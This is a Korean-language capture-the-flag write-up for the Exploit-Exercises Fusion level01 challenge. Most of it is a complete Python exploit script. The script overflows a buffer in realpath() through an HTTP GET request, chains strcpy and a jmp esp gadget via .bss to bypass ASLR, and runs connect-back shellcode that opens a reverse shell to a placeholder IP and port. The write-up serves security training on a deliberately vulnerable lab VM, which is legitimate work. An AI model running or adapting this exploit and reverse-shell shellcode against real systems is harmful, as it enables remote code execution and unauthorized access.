[exploit-exercise] fusion level01

level01 문제는 이전 level00 문제에서 ASLR 보호기법이 추가되고, buffer 변수의 주소 값을 주지 않게 수정되었습니다.

ASLR이 걸려있어서 이전 소스에 eip에 들어가는 buffer 변수의 주소값을 랜덤으로 브루트포싱 해도 되지만, ROP로 하는 방법이 더욱 깔끔하고 익스플로잇도 한 번에 성공할 수 있습니다.

bof가 발생하는 부분은 이전 문제와 같이 realpath() 함수입니다.

import struct from socket import * import time import re host = "192.168.0.107" port = 20001 p = lambda x: struct.pack("<L", x) shellcode = ("\x31\xdb\xf7\xe3\x52\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x93\x59\x68" "\xaa\xbb\xcc\xdd" #ip "\x66\x68" "\x05\x39" #port "\x66\x51\xb0\x3f\xcd\x80\x49\x79\xf9\x89\xe1\x6a\x10\x51\x53\x89\xe1\xb0" "\x66\xcd\x80\x52\xb8\x44\x44\x44\x44\x35\x2a\x6b\x37\x2c\x50\xb8\x44\x44" "\x44\x44\x35\x6b\x6b\x26\x2d\x50\x31\xc0\x31\xc9\x89\xe3" "\xb0\x0b\xcd\x80") def recv_until(s, strings): data = '' while 1: if strings in data: return data else: data += s.recv(1) def reguler_e(strings): m = re.compile('0x[\w]{8}') result = int(m.findall(strings).pop(), 16) return result def exploit(s): #strings = recv_until(s, ":-)\n") #buffer_addr = reguler_e(strings) #print " - recv stack buffer :", hex(buffer_addr) print '' jmp_esp = 0x8049f4f # ff e4 bss = 0x804b524 strcpy_plt = 0x80489a0 ppr = 0x8049a2e payload = '' payload += 'GET ' payload += "\x90"*139 payload += p(strcpy_plt) payload += p(ppr) payload += p(bss) payload += p(jmp_esp) payload += p(bss) payload += "\x90"*40 payload += shellcode payload += ' HTTP/1.1' payload += '\n' print "[+] Sending Payload..." s.send(payload) time.sleep(0.2) print "[+] Exploit Done!!" time.sleep(2) s.close() def connect(): s = socket(AF_INET, SOCK_STREAM) s.connect((host, port)) return s def main(): s = connect() print "[+] Exploit-Exercise Fusion Level01" print "[+] host : "+host+', port : '+str(port) exploit(s) if __name__ == "__main__": main()

위 exploit 코드에서는 bss 영역에 jmp *esp instruction(0xff 0xe4)를 넣어주고 프로그램 실행을 bss 영역으로 변경하게 되면 jmp *esp를 실행하게 되는데, 최초 공격 페이로드 삽입 시 뒷 부분에 NOP+shellcode를 넣어주면 바로 쉘코드를 실행하게 됩니다.

이는 물론 NX-bit 보호 기법이 걸려있지 않기 때문입니다.